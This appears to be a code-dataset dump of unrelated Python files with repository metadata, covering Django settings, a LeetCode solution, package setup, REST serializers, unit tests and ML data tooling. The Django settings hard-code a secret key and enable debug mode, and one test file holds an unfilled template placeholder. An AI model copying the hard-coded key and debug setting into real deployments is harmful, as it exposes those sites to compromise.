SECRET_KEY = '^64z^z=y70*bafuc2%w#le0%j%fo7a3jvc%1&0hmg^ah*z%$_k'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'polls',
'todo',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'mysite.urls'
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
# Template
TEMPLATE_DIRS = [os.path.join(BASE_DIR, 'templates')] | [
"[email protected]"
] | |
c9457f2571685a6762cf2e937a5be97dcb5f5e05 | 205c1bd0e473f0e9aa31db1256aec5d1f5a233d4 | /word break/1.py | bc1b430c1b4d8348d2f9deda7ddead62247e4488 | [
"MIT"
] | permissive | cerebrumaize/leetcode | 4256215a3762a5de7f3258d43a03cae11357641d | 869ee24c50c08403b170e8f7868699185e9dfdd1 | refs/heads/master | 2021-01-12T09:20:10.891530 | 2017-10-17T06:15:21 | 2017-10-17T06:15:21 | 76,133,209 | 0 | 0 | null | 2016-12-23T07:22:58 | 2016-12-10T19:31:44 | Python | UTF-8 | Python | false | false | 694 | py | #!/usr/bin/env python
'''code description'''
# pylint: disable = I0011, E0401, C0103
class Solution(object):
'''Solution description'''
def func(self, s, wordDict):
'''Solution function description'''
d = [False] * len(s)
for i in range(len(s)):
for w in wordDict:
if w == s[i-len(w)+1: i+1] and ((d[i-len(w)]) or i-len(w) == -1):
d[i] = True
continue
return d[-1]
def main():
'''main function'''
_solution = Solution()
res, inp = [], [('words', ['word', 'words', 'list'])]
for i in inp:
print(_solution.func(i[0], i[1]))
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
630e3b59bc97ae65efd9cdf123fa18dc17a216c8 | 69c81130633ba4d41b1ec938f0fc586f777e95ba | /setup.py | 7e3762cd896e38a132a848717fe69bc6b7b3c13b | [
"ISC"
] | permissive | pregiotek/drf-tracking | d8ff934e884e7908f997f524d4e363914c2f11b2 | f40c87a7e392009cdffa7b893e964b51f2faeb5b | refs/heads/master | 2021-01-18T07:51:57.961574 | 2016-09-09T14:34:44 | 2016-09-09T14:34:44 | 67,803,102 | 1 | 0 | null | 2016-09-09T13:54:10 | 2016-09-09T13:54:08 | Python | UTF-8 | Python | false | false | 2,771 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import re
import os
import sys
from setuptools import setup
name = 'drf-tracking'
package = 'rest_framework_tracking'
description = 'Utils to log Django Rest Framework requests to the database'
url = 'https://github.com/aschn/drf-tracking'
author = 'Anna Schneider'
author_email = '[email protected]'
license = 'BSD'
def get_version(package):
"""
Return package version as listed in `__version__` in `init.py`.
"""
init_py = open(os.path.join(package, '__init__.py')).read()
return re.search("^__version__ = ['\"]([^'\"]+)['\"]",
init_py, re.MULTILINE).group(1)
def get_packages(package):
"""
Return root package and all sub-packages.
"""
return [dirpath
for dirpath, dirnames, filenames in os.walk(package)
if os.path.exists(os.path.join(dirpath, '__init__.py'))]
def get_package_data(package):
"""
Return all files under the root package, that are not in a
package themselves.
"""
walk = [(dirpath.replace(package + os.sep, '', 1), filenames)
for dirpath, dirnames, filenames in os.walk(package)
if not os.path.exists(os.path.join(dirpath, '__init__.py'))]
filepaths = []
for base, filenames in walk:
filepaths.extend([os.path.join(base, filename)
for filename in filenames])
return {package: filepaths}
version = get_version(package)
if sys.argv[-1] == 'publish':
if os.system("pip freeze | grep wheel"):
print("wheel not installed.\nUse `pip install wheel`.\nExiting.")
sys.exit()
os.system("python setup.py sdist upload")
os.system("python setup.py bdist_wheel upload")
print("You probably want to also tag the version now:")
print(" git tag -a {0} -m 'version {0}'".format(version))
print(" git push --tags")
sys.exit()
setup(
name=name,
version=version,
url=url,
license=license,
description=description,
author=author,
author_email=author_email,
packages=get_packages(package),
package_data=get_package_data(package),
install_requires=[],
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Natural Language :: English',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Internet :: WWW/HTTP',
]
)
| [
"[email protected]"
] | |
597769bb6af4fe6e7af805283822cccd04fed89e | 69bfc9d5bf983ca0cf98ed53f8eace0f1b77e60b | /application/controllers/pies/delete.py | b9c3d21a4512a2834344692d64fa18f28265432c | [] | no_license | RicardoAntonio24/otomi | 679c26f4c85b7782bfbd768e5f16f33524599f2f | 1f40bd3b5af1337c1c6c518d7289d13538da7568 | refs/heads/master | 2020-05-24T04:39:28.208177 | 2019-05-16T21:19:57 | 2019-05-16T21:19:57 | 187,097,199 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,935 | py | import config
import hashlib
import app
class Delete:
def __init__(self):
pass
'''
def GET(self, id_palabra_pies, **k):
if app.session.loggedin is True: # validate if the user is logged
# session_username = app.session.username
session_privilege = app.session.privilege # get the session_privilege
if session_privilege == 0: # admin user
return self.GET_DELETE(id_palabra_pies) # call GET_DELETE function
elif privsession_privilegeilege == 1: # guess user
raise config.web.seeother('/guess') # render guess.html
else: # the user dont have logged
raise config.web.seeother('/login') # render login.html
def POST(self, id_palabra_pies, **k):
if app.session.loggedin is True: # validate if the user is logged
# session_username = app.session.username
session_privilege = app.session.privilege
if session_privilege == 0: # admin user
return self.POST_DELETE(id_palabra_pies) # call POST_DELETE function
elif session_privilege == 1: # guess user
raise config.web.seeother('/guess') # render guess.html
else: # the user dont have logged
raise config.web.seeother('/login') # render login.html
@staticmethod
def GET_DELETE(id_palabra_pies, **k):
@staticmethod
def POST_DELETE(id_palabra_pies, **k):
'''
def GET(self, id_palabra_pies, **k):
message = None # Error message
id_palabra_pies = config.check_secure_val(str(id_palabra_pies)) # HMAC id_palabra_pies validate
result = config.model.get_pies(int(id_palabra_pies)) # search id_palabra_pies
result.id_palabra_pies = config.make_secure_val(str(result.id_palabra_pies)) # apply HMAC for id_palabra_pies
return config.render.delete(result, message) # render delete.html with user data
def POST(self, id_palabra_pies, **k):
form = config.web.input() # get form data
form['id_palabra_pies'] = config.check_secure_val(str(form['id_palabra_pies'])) # HMAC id_palabra_pies validate
result = config.model.delete_pies(form['id_palabra_pies']) # get pies data
if result is None: # delete error
message = "El registro no se puede borrar" # Error messate
id_palabra_pies = config.check_secure_val(str(id_palabra_pies)) # HMAC user validate
id_palabra_pies = config.check_secure_val(str(id_palabra_pies)) # HMAC user validate
result = config.model.get_pies(int(id_palabra_pies)) # get id_palabra_pies data
result.id_palabra_pies = config.make_secure_val(str(result.id_palabra_pies)) # apply HMAC to id_palabra_pies
return config.render.delete(result, message) # render delete.html again
else:
raise config.web.seeother('/pies') # render pies delete.html
| [
"[email protected]"
] | |
5366df88285235633e44287a3950189650d383b1 | 2d9cea7839a900921850f2af1ccafc623b9d53b9 | /websecurityscanner/google/cloud/websecurityscanner_v1alpha/types.py | 594571c6551b0c0557820428c4ec53212cbc344e | [
"Apache-2.0"
] | permissive | smottt/google-cloud-python | cb28e8d59cc36932aa89e838412fe234f6c4498c | 2982dd3d565923509bab210eb45b800ce464fe8a | refs/heads/master | 2020-03-31T21:12:02.209919 | 2018-10-10T18:04:44 | 2018-10-10T18:04:44 | 152,571,541 | 0 | 1 | Apache-2.0 | 2018-10-11T10:10:47 | 2018-10-11T10:10:47 | null | UTF-8 | Python | false | false | 2,175 | py | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import sys
from google.api import http_pb2
from google.protobuf import descriptor_pb2
from google.protobuf import empty_pb2
from google.protobuf import field_mask_pb2
from google.protobuf import timestamp_pb2
from google.api_core.protobuf_helpers import get_messages
from google.cloud.websecurityscanner_v1alpha.proto import crawled_url_pb2
from google.cloud.websecurityscanner_v1alpha.proto import finding_addon_pb2
from google.cloud.websecurityscanner_v1alpha.proto import finding_pb2
from google.cloud.websecurityscanner_v1alpha.proto import (
finding_type_stats_pb2)
from google.cloud.websecurityscanner_v1alpha.proto import scan_config_pb2
from google.cloud.websecurityscanner_v1alpha.proto import scan_run_pb2
from google.cloud.websecurityscanner_v1alpha.proto import (
web_security_scanner_pb2)
_shared_modules = [
http_pb2,
descriptor_pb2,
empty_pb2,
field_mask_pb2,
timestamp_pb2,
]
_local_modules = [
crawled_url_pb2,
finding_addon_pb2,
finding_pb2,
finding_type_stats_pb2,
scan_config_pb2,
scan_run_pb2,
web_security_scanner_pb2,
]
names = []
for module in _shared_modules:
for name, message in get_messages(module).items():
setattr(sys.modules[__name__], name, message)
names.append(name)
for module in _local_modules:
for name, message in get_messages(module).items():
message.__module__ = 'google.cloud.websecurityscanner_v1alpha.types'
setattr(sys.modules[__name__], name, message)
names.append(name)
__all__ = tuple(sorted(names))
| [
"[email protected]"
] | |
d0f53731c66521d73bfc425db0bd9aa49b385163 | 5d355461220921ccee1b96b764452da26d40f304 | /leadmanager/accounts/serializers.py | 2a069ad4eb67eb9641ec740e6c82d8b4989dd596 | [] | no_license | craigbunton/lead_manager_react_django | ec36dc1a1e376ed1d1a1305b5d480675e9bd7872 | 7f5b35f2978b0350b29e98462ae0afd84c725832 | refs/heads/master | 2023-01-29T03:26:35.390790 | 2020-01-23T10:46:24 | 2020-01-23T10:46:24 | 218,880,992 | 0 | 0 | null | 2023-01-07T11:17:35 | 2019-10-31T23:58:53 | JavaScript | UTF-8 | Python | false | false | 1,080 | py | from rest_framework import serializers
from django.contrib.auth.models import User
from django.contrib.auth import authenticate
# User Serializer
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ("id", "username", "email")
# Register Serializer
class RegisterSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ("id", "username", "email", "password")
extra_kwargs = {"password": {"write_only": True}}
def create(self, validated_data):
user = User.objects.create_user(
validated_data["username"],
validated_data["email"],
validated_data["password"],
)
return user
# Login Serializer
class LoginSerializer(serializers.Serializer):
username = serializers.CharField()
password = serializers.CharField()
def validate(self, data):
user = authenticate(**data)
if user and user.is_active:
return user
raise serializers.ValidationError("Incorrect Credentials")
| [
"[email protected]"
] | |
5b359b667dad448b3a80c84e30867c87d641f496 | c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c | /cases/pa3/sample/str_get_element-42.py | 890eb44f037c7631688f2cc5967b68b4d12596ca | [] | no_license | Virtlink/ccbench-chocopy | c3f7f6af6349aff6503196f727ef89f210a1eac8 | c7efae43bf32696ee2b2ee781bdfe4f7730dec3f | refs/heads/main | 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 184 | py | x:str = "abc"
a:str = ""
b:str = ""
c:str = ""
def str_get(s:str, $TypedVar) -> str:
return s[i]
a = str_get(x, 0)
b = str_get(x, 1)
c = str_get(x, 2)
print(a)
print(b)
print(c)
| [
"[email protected]"
] | |
00c829a3af846d4b674adb602f7b10fbd85dd30f | 03408fccb18ad545aea32ca3fe82acae54261a1f | /check for n and its double.py | 4e34fa68d1c04ef9fd8d3f52054524222fa35179 | [] | no_license | rehoboth23/leetcode-base | 7253f768da27a75650704980f0e0ab039123e84d | 9d8dfd05f6367ea2b5e2b1c490f09a18fa5e8a14 | refs/heads/main | 2023-01-02T11:11:07.539139 | 2020-10-25T17:41:53 | 2020-10-25T17:41:53 | 307,154,350 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 322 | py | class Solution:
"""
use set matching theory; check first then add last to account for 0
"""
def checkIfExist(self, arr: [int]) -> bool:
s = set()
for i in arr:
if 2 * i in s:
return True
if i / 2 in s:
return True
s.add(i) | [
"[email protected]"
] | |
e5aa8b2e31423c297291bfb6fa1566f5d4d0ffd4 | 87026962f460910c8ea3319f26bce1fcb9b0d9b0 | /comprehensions/os_walk.py | 83e8c9417ed835292bb5d48dacdad3760e4fb3b9 | [] | no_license | psyoblade/python-for-dummies | 566cf772dee4c99e32202d9975470756e0a12ac0 | edf1aec90cda81ccb6a40785bd6fd7b110173e72 | refs/heads/master | 2022-05-31T18:08:28.608291 | 2022-05-05T10:37:12 | 2022-05-05T10:37:12 | 123,752,733 | 0 | 0 | null | 2022-05-05T01:10:41 | 2018-03-04T03:19:57 | Python | UTF-8 | Python | false | false | 526 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
import os
# [ value ]
def os_walk_dirs(root, ext):
return [os.path.join(d[0], f) for d in os.walk(root) for f in d[2] if f.endswith(ext)]
# for python_file in os_walk_dirs('.', '.py'):
# print(python_file)
inner_outer = [str(inner) + ":" + str(outer) for inner in range(0,5) for outer in range(6,9)]
print(inner_outer)
outer_inner = [[str(inner) + ":" + str(outer) for inner in range(0,5)] for outer in range(6,9)]
print(outer_inner)
assert(inner_outer != outer_inner) | [
"[email protected]"
] | |
ab5719fac5041d62271c2e6278c29f604e00f121 | 14fdd90df17717516b6ef7496f2934f9f9614d9d | /rest_app/main.py | 7ccc7e10ad7aa88f587a92ff0855ba9e81de9237 | [] | no_license | rafee/mlDataAssignment | 16ea10526f559a99686f109e9c8236e88d8e3b6e | db3792fa6da3469ae185f5199f8807dac14a81b5 | refs/heads/master | 2020-08-24T12:52:27.609709 | 2019-11-08T23:24:10 | 2019-11-08T23:24:10 | 216,829,342 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,944 | py | from flask import Flask, jsonify, request
import csv
from google.cloud import storage
app = Flask(__name__)
def parse_method(BUCKET='assignment1-data', FILE='Input-Data/NDBench-testing.csv'):
client = storage.Client()
bucket = client.get_bucket(BUCKET)
blob = bucket.get_blob(FILE)
csv_data = blob.download_as_string()
read_data = csv.reader(csv_data.decode("utf-8").splitlines())
return list(read_data)
@app.route('/')
def hello():
"""Return a friendly HTTP greeting."""
return 'Hello World!'
@app.route('/v1/mldata/', methods=["GET"])
def GetSamples():
RFWID = request.headers.get('rfwid')
RFWID = int(RFWID)
benchmarkType_source = request.args['source']
benchmarkType_type = request.args['type']
workloadMetric = request.args['workloadMetric']
batchUnit = request.args['batchUnit']
batchId = request.args['batchId']
batchSize = request.args['batchSize']
bucket = 'assignment1-data'
file = 'Input-Data/'+benchmarkType_source+'-'+benchmarkType_type+'.csv'
loaded_data = parse_method(bucket, file)
loaded_data = loaded_data[1:] # Skipping first row
batchId = int(batchId)
batchUnit = int(batchUnit)
batchSize = int(batchSize)
starting_index = (batchId-1)*batchUnit
finishing_index = (batchId+batchSize-1)*batchUnit
lookup_dict = {'CPU': 0, 'NetworkIn': 1, 'NetworkOut': 2, 'Memory': 3}
metricIndex = lookup_dict[workloadMetric]
outputs = [float(data[metricIndex]) for data in loaded_data]
outputs = outputs[starting_index:finishing_index]
return jsonify(rfwid=RFWID, lastbatchId=batchId+batchSize - 1, samples=outputs)
if __name__ == '__main__':
# This is used when running locally only. When deploying to Google App
# Engine, a webserver process such as Gunicorn will serve the app. This
# can be configured by adding an `entrypoint` to app.yaml.
app.run(host='127.0.0.1', port=8080, debug=True)
| [
"[email protected]"
] | |
36fddc7fd02e3a92abe9ba83dd50b520aac10d94 | 16d86ac6f2a8b471f8bf56fb47561eb1230a2be7 | /Exemplos/CursoPython/Aula02/exemplo_classes.py | e42e324053892d2a0efa7afc37b22dec2d92316c | [
"MIT"
] | permissive | Winderson/inteligencia-artificial-1 | f872a38c156690e257fcae8bd0fee2106a8af36f | 19acf6ce5c6d14f306f47bd1a07e227633458df9 | refs/heads/master | 2020-03-30T07:24:41.005736 | 2018-09-26T23:29:26 | 2018-09-26T23:29:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,188 | py | #!/usr/bin/env python
# SINTAXE:
# class <NomeDaClasse>(<classe_pai>):
# <metodos>
from typing import List
import numpy as np
class Aluno():
"""Representa um aluno da escola."""
def __init__(self, nome:str = ''):
"""Construtor da classe."""
# No construtor sao declarados os atributos
# Atributos sao sempre publicos
# self.nome = nome
# self.sobrenome = ''
# self.notas = [0, 0]
# Atributos protegidos
# self._nome = nome
# self._sobrenome = ''
# self._notas = []
# Atributos privados
self.__nome = nome.upper()
self.__sobrenome = ''
self.__notas = []
def __str__(self):
texto = ''
texto += f'Nome.....: {self.__nome} {self.__sobrenome}\n'
texto += f'Notas....: {self.__notas}\n'
texto += f'Media....: {self.media()}\n'
return texto
def __lt__(self, other):
return self.media() < other.media()
# @property: decorator - Injeta codigo em alguma funcao
# Usado para gerar um getter
@property
def nome(self):
return self.__nome.upper()
@nome.setter
def nome(self, nome):
self.__nome = nome
@property
def sobrenome(self):
return self.__sobrenome.upper()
@sobrenome.setter
def sobrenome(self, sobrenome):
self.__sobrenome = sobrenome
@property
def notas(self):
return self.__notas
@notas.setter
def notas(self, notas: List[float]):
for nota in notas:
if nota < 0 or nota > 100:
raise RuntimeError('Nota fora do intervalo 0..100')
self.__notas = notas
def media(self):
return np.mean(self.__notas)
def main():
aluno1 = Aluno()
aluno1.nome = 'Joaquim'
aluno1.sobrenome = 'Branganca e Orleans'
aluno1.notas = [90, 100]
aluno2 = Aluno('Carlinhos')
aluno2.notas = [20, 90]
aluno3 = Aluno(nome='Chiquinha')
print(f'Nome.....: {aluno1.nome} {aluno1.sobrenome}')
print(f'Notas....: {aluno1.notas}')
print(f'Media....: {aluno1.media()}')
print(aluno2)
if __name__ == '__main__':
main() | [
"[email protected]"
] | |
da3e82dfc76303e43f05fa7cf081576377d5b684 | d6b99ab3cc7108f4f0cc0be899641ac990e30db9 | /multipleOf3or5/test.py | a42133ea858991b66c5473b82f3bb50e49e4df3b | [] | no_license | AsemAntar/codewars_problems | ef97e8a8058551276cdb943a07474cbeb9353c4d | c0ae0a769e16211c2b8e325d1116a6cebd3be016 | refs/heads/master | 2020-08-10T02:01:12.411030 | 2019-12-15T22:45:20 | 2019-12-15T22:45:20 | 214,229,082 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,402 | py | import unittest
from multiple_of_3_or_5 import solutions, solution, math_solution
class TESTSOLUTIONS(unittest.TestCase):
def test_solutions(self):
with self.subTest():
self.assertEqual(solutions(10), 23, 'should be 23')
with self.subTest():
self.assertEqual(solutions(11), 33, 'should be 33')
with self.subTest():
self.assertEqual(solutions(16), 60, 'should be 60')
with self.subTest():
self.assertEqual(solutions(26), 168, 'should be 168')
def test_solution(self):
with self.subTest():
self.assertEqual(solution(10), 23, 'should be 23')
with self.subTest():
self.assertEqual(solution(11), 33, 'should be 33')
with self.subTest():
self.assertEqual(solution(16), 60, 'should be 60')
with self.subTest():
self.assertEqual(solution(26), 168, 'should be 168')
def test_math_solution(self):
with self.subTest():
self.assertEqual(math_solution(10), 23, 'should be 23')
with self.subTest():
self.assertEqual(math_solution(11), 33, 'should be 33')
with self.subTest():
self.assertEqual(math_solution(16), 60, 'should be 60')
with self.subTest():
self.assertEqual(math_solution(26), 168, 'should be 168')
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
1a3b2dcbc469c0bd1ee4f977fbf9cca6dd710acc | 05b262df0935338ed8b86110acad96332a5ba424 | /{{cookiecutter.directory_name}}/{{cookiecutter.pkg_name}}/tests/unit/route_test.py | abb4ca0d8b717e4b65d96acade0f0e7353d4498c | [] | no_license | ramonlimaramos/ramons-cookie-py | 0705906060e4f40c35b4b5f46e4cb6d91c0e276d | 2728e35482ca570c34cc13f9e47030a7476c323c | refs/heads/develop | 2023-03-29T20:54:11.332821 | 2021-04-08T20:57:09 | 2021-04-08T20:57:09 | 346,442,689 | 1 | 0 | null | 2021-04-08T20:57:10 | 2021-03-10T17:46:34 | Python | UTF-8 | Python | false | false | 717 | py | from unittest import TestCase
from flask import Flask
from {{cookiecutter.pkg_name}}.tests.mixins import JsonMixin
from {{cookiecutter.pkg_name}}.api import api
class RouteTest(JsonMixin, TestCase):
def setUp(self):
super(RouteTest, self).setUp()
self.app = Flask(__name__)
self.app.register_blueprint(api, url_prefix='/')
self.client = self.app.test_client()
def tearDown(self):
super(RouteTest, self).tearDown()
def when_acess_home(self):
self.response = self.client.get('/home/')
def test_api_home_route_is_up(self):
self.when_acess_home()
self.assert_ok()
self.assert_response_has(message='Hello ramons-cookie-py')
| [
"[email protected]"
] | |
e5abf28f7e9696925ef3d1e4157a0d1afd8b47ba | d5322a991d6d9f1f943efd02b78fb1f32eafdee5 | /cnn-rate-distortion/tools/dataset.py | 4c5aa413db5dfb5152a84d8f5a6c3c6fe03925b9 | [
"Apache-2.0"
] | permissive | duckcrack/cnn-rate-distortion | 9667ae23d6666a2cd63ae55a5206979ed38fa315 | 670826aff3c6232b5b4399f9b80f2078c606f41c | refs/heads/master | 2023-03-17T21:59:25.836891 | 2020-06-18T15:35:33 | 2020-06-18T15:35:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,957 | py | #
# Copyright 2020 BBC Research & Development
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from tools.reader import YuvReader
from glob import glob
import os
import re
import h5py
import numpy as np
def shape_from_filename(filename):
rgx = re.compile(r'([0-9]+)x([0-9]+)')
result = re.search(rgx, filename)
width = int(result.group(1))
height = int(result.group(2))
return width, height
def qp_from_file_name(filename):
rgx = re.compile(r'QP_([0-9]+)')
result = re.search(rgx, filename)
qp = float(result.group(1))
return qp
def read_single_frame(file_name, width, height, format_='yuv420p'):
with YuvReader(file_name, width, height, format_) as yuv_reader:
y, _, _ = yuv_reader.next_y_u_v()
y = y.astype('float')
return y
def prepare_distortion_data(data_name, orig_dir, reco_dir, width, height, levels, model, h5_dir):
file_name = '{0}_{1}_{2}x{3}.h5'.format(data_name, model, width, height)
file_name = os.path.join(h5_dir, file_name)
with h5py.File(file_name, 'w') as hf:
hf.create_dataset('input', (1, height, width, 2), maxshape=(None, height, width, 2))
hf.create_dataset('label', (1, height, width, 1), maxshape=(None, height, width, 1))
orig_frames = sorted(glob(os.path.join(orig_dir, '*.yuv')))
reco_frames = sorted(glob(os.path.join(reco_dir, '**', '*.yuv')))
img_scale = 2 ** 8 - 1.
qp_scale = 51.
idx = 0
for i in range(len(orig_frames)):
w, h = shape_from_filename(orig_frames[i])
y_orig = read_single_frame(orig_frames[i], w, h)
for j in range(levels):
reco_name = reco_frames[i * levels + j]
qp = qp_from_file_name(reco_name) / qp_scale
y_reco = read_single_frame(reco_name, w, h)
w = width * (w // width)
h = height * (h // height)
y_orig = y_orig[:h, :w] / img_scale
y_reco = y_reco[:h, :w] / img_scale
diff = np.abs(y_orig - y_reco)
for y in range(0, h, height):
for x in range(0, w, width):
hf['input'][idx, :, :, 0] = y_orig[y:y + height, x:x + width]
hf['input'][idx, :, :, 1] = qp
hf['label'][idx, :, :, 0] = diff[y:y + height, x:x + width]
idx += 1
hf['input'].resize((idx + 1, height, width, 2))
hf['label'].resize((idx + 1, height, width, 1))
def prepare_rate_data(data_name, input_dir, label_dir, width, height, levels, model, h5_dir):
"""
Each line of a rate file includes:
x y rate-level-1 rate-level-2 ... rate-level-n
"""
file_name = '{0}_{1}_{2}x{3}.h5'.format(data_name, model, width, height)
file_name = os.path.join(h5_dir, file_name)
with h5py.File(file_name, 'w') as hf:
hf.create_dataset('input', (1, height, width, 1), maxshape=(None, height, width, 1))
hf.create_dataset('label', (1, levels), maxshape=(None, levels))
orig_frames = sorted(glob(os.path.join(input_dir, '*.yuv')))
rate_data = sorted(glob(os.path.join(label_dir, '*.txt')))
idx = 0
scale_factor = 2 ** 8 - 1.
global_max = -1
for i in range(len(orig_frames)):
data_ = {}
with open(rate_data[i], 'r') as file_:
for line in file_:
line_ = np.fromstring(line, dtype=int, sep=' ')
rates = line_[2:]
rates = rates.astype('float')
data_['{0}x{1}'.format(line_[0], line_[1])] = rates
global_max = max(global_max, np.max(rates))
w, h = shape_from_filename(orig_frames[i])
y_orig = read_single_frame(orig_frames[i], w, h)
w = width * (w // width)
h = height * (h // height)
y_orig = y_orig[:h, :w] / scale_factor
for y in range(0, h, height):
for x in range(0, w, width):
hf['input'][idx, :, :, 0] = y_orig[y:y + height, x:x + width]
hf['label'][idx, :] = data_['{0}x{1}'.format(x, y)]
idx += 1
hf['input'].resize((idx + 1, height, width, 1))
hf['label'].resize((idx + 1, levels))
hf.attrs['global_max'] = global_max
| [
"[email protected]"
] | |
44409bdac0a0b49c9b2be22d241b768ad0259208 | a84f01e6a2419cfa6e4aeaa42e211a7767769666 | /src/utils.py | edd8fa5bb5a8c005a678b71b91ce78d73e7d994f | [] | no_license | MarkusGW/trading_evolved | 4ad11b18b49763969e8132ff432da629a742301a | 90dd50c1e608f8dc9841ac29b4b5c6c1d72b0380 | refs/heads/master | 2023-01-14T03:59:15.320872 | 2020-11-22T12:08:08 | 2020-11-22T12:08:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 829 | py | import pandas as pd
from typing import List
idx = pd.date_range(start="1997-01-01", end="1997-01-10", tz="utc", freq="D")
EQUITIES = [
"JNJ",
"KO",
"AXP",
"HON",
"DIS",
"PG",
"INTC",
"AMGN",
"VZ",
"GS",
"UNH",
"CSCO",
"WMT",
"JPM",
"MRK",
"MCD",
"MMM",
"CVX",
"MSFT",
"TRV",
"CAT",
"WBA",
"DOW",
"V",
"CRM",
"NKE",
"IBM",
"BA",
"AAPL",
]
def generate_dummy_sp500_components(
start_date: str, end_date: str, components: List[str] = None
):
idx = pd.date_range(start=start_date, end=end_date, tz="utc", freq="D")
df = pd.DataFrame(index=idx)
if not components:
df["components"] = ",".join(EQUITIES)
else:
raise NotImplementedError("components must be None!")
return df
| [
"[email protected]"
] | |
b6efe0490d8451eae030d3b8436a66669ef88d37 | 6b26161e09d76c265a628a9f985e25ce06d61f0f | /src/openpose-baseline/src/predict_3dpose.py | 43aa6ff5f4a8eb1fc5415ba63a4b457dbcb95689 | [
"MIT"
] | permissive | iamarcel/thesis | 362925af6549eac149b6c4c30b9f0f27f3c125e1 | ecbf8fbdce8ef54a85757eaf3dae7337c2b30581 | refs/heads/master | 2021-04-18T22:33:44.406582 | 2018-08-14T11:09:51 | 2018-08-14T11:09:51 | 126,800,975 | 2 | 0 | null | 2020-03-30T20:38:32 | 2018-03-26T08:55:35 | Python | UTF-8 | Python | false | false | 20,728 | py |
"""Predicting 3d poses from 2d joints"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import os
import random
import sys
import time
import h5py
import copy
import matplotlib.pyplot as plt
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
import procrustes
import viz
import cameras
import data_utils
import linear_model
tf.app.flags.DEFINE_float("learning_rate", 1e-3, "Learning rate")
tf.app.flags.DEFINE_float("dropout", 1, "Dropout keep probability. 1 means no dropout")
tf.app.flags.DEFINE_integer("batch_size", 64, "Batch size to use during training")
tf.app.flags.DEFINE_integer("epochs", 200, "How many epochs we should train for")
tf.app.flags.DEFINE_boolean("camera_frame", False, "Convert 3d poses to camera coordinates")
tf.app.flags.DEFINE_boolean("max_norm", False, "Apply maxnorm constraint to the weights")
tf.app.flags.DEFINE_boolean("batch_norm", False, "Use batch_normalization")
# Data loading
tf.app.flags.DEFINE_boolean("predict_14", False, "predict 14 joints")
tf.app.flags.DEFINE_boolean("use_sh", False, "Use 2d pose predictions from StackedHourglass")
tf.app.flags.DEFINE_string("action","All", "The action to train on. 'All' means all the actions")
# Architecture
tf.app.flags.DEFINE_integer("linear_size", 1024, "Size of each model layer.")
tf.app.flags.DEFINE_integer("num_layers", 2, "Number of layers in the model.")
tf.app.flags.DEFINE_boolean("residual", False, "Whether to add a residual connection every 2 layers")
# Evaluation
tf.app.flags.DEFINE_boolean("procrustes", False, "Apply procrustes analysis at test time")
tf.app.flags.DEFINE_boolean("evaluateActionWise",False, "The dataset to use either h36m or heva")
# Directories
tf.app.flags.DEFINE_string("cameras_path","data/h36m/cameras.h5","Directory to load camera parameters")
tf.app.flags.DEFINE_string("data_dir", "data/h36m/", "Data directory")
tf.app.flags.DEFINE_string("train_dir", "experiments", "Training directory.")
# openpose
